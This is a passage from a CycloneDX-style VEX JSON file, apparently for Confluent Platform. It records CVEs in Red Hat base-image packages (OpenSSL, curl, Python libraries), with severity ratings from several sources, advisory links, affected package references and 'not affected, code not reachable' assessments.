          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-7383",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Issue summary: A signed integer overflow when sizing the destination\nbuffer for Unicode output in ASN1_mbstring_ncopy() can lead to a heap\nbuffer overflow.\n\nImpact summary: A heap buffer overflow may lead to a crash or possibly\nattacker controlled code execution or other undefined behaviour.\n\nIn ASN1_mbstring_copy() and ASN1_mbstring_ncopy() the destination\nsize for Unicode output is computed in a signed int: by left shift\nof the input character count for BMPSTRING (UTF-16) and\nUNIVERSALSTRING (UTF-32), and by summing per-character byte counts\nfor UTF8STRING. The calculation overflows when the input reaches\naround 2^30 characters. In the worst case (UNIVERSALSTRING at 2^30\ncharacters) the size wraps to zero, OPENSSL_malloc(1) is called, and\nthe subsequent character copy writes several gigabytes past the\none-byte allocation.\n\nX.509 certificate processing routes through ASN1_STRING_set_by_NID(),\nwhose DIRSTRING_TYPE mask excludes UNIVERSALSTRING and whose per-NID\nsize limits cap the input length; no network protocol or\ncertificate-handling path in OpenSSL exercises the overflow.\nTriggering the bug requires an application that calls\nASN1_mbstring_copy() or ASN1_mbstring_ncopy() directly, or registers\na custom string type via ASN1_STRING_TABLE_add(), with\nattacker-controlled input on the order of half a gigabyte or more.\nFor these reasons this issue was assigned Low severity.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by\nthis issue, as the affected code is outside the OpenSSL FIPS module\nboundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-7383"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25237"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25239"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-7383"
        },
        {
          "url": "https://bugzilla.redhat.com/2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/2481898"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481898"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-25237.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:25239"
        },
        {
          "url": "https://github.com/advisories/GHSA-w853-v86g-gv7j"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/4f8d2bddaa2c8e06f9c33390ee1717059a6e4be6"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/80c15faaf78042bbb8654a0e234c50c381732f74"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/bd17511070fb39a67bfa19682affb765e706a974"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/c332adaced43bcbb85f97410597e951c11ec3083"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/d32350ae8ef7426718f5aa9e383d4b51398ee255"
        },
        {
          "url": "https://github.com/openssl/security/commit/4f8d2bddaa2c8e06f9c33390ee1717059a6e4be6"
        },
        {
          "url": "https://github.com/openssl/security/commit/80c15faaf78042bbb8654a0e234c50c381732f74"
        },
        {
          "url": "https://github.com/openssl/security/commit/bd17511070fb39a67bfa19682affb765e706a974"
        },
        {
          "url": "https://github.com/openssl/security/commit/c332adaced43bcbb85f97410597e951c11ec3083"
        },
        {
          "url": "https://github.com/openssl/security/commit/d32350ae8ef7426718f5aa9e383d4b51398ee255"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-7383.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50379.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7383"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-7383"
        }
      ],
      "published": "2026-06-09T17:17:50+00:00",
      "updated": "2026-07-23T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-8286",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        295
      ],
      "description": "A vulnerability exists where a new transfer that uses STARTTLS to upgrade the\nconnection might reuse an existing live connection even though the TLS\nconfiguration mismatches so it should not.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8286"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55439"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8286"
        },
        {
          "url": "https://bugzilla.redhat.com/2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/2496763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496763"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-8286.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8286.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8286.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3783"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8286"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9547"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55439.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55439"
        },
        {
          "url": "https://github.com/advisories/GHSA-32xh-3x3c-6g6h"
        },
        {
          "url": "https://hackerone.com/reports/3718195"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-8286.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8286"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8286"
        }
      ],
      "published": "2026-07-03T07:16:24+00:00",
      "updated": "2026-07-07T19:42:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
